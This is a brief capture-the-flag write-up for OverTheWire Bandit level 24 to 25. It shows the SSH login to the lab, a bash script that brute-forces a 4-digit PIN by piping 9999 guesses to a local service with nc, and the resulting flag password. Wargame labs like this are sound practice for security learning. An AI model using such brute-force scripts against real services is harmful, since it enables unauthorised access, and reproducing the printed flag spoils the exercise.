### Bandit Write Up
### Level 24 --> 25
ssh bandit24@bandit.labs.overthewire.org -p 2220
cd /tmp
nano cracker.sh
###!/bin/bash
##touch cracker.txt
##for i in $(seq 1 9999);
##do
##	echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i >> cracker.txt
##done
##cat cracker.txt | nc localhost 30002
##rm cracker.txt
# Flag is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG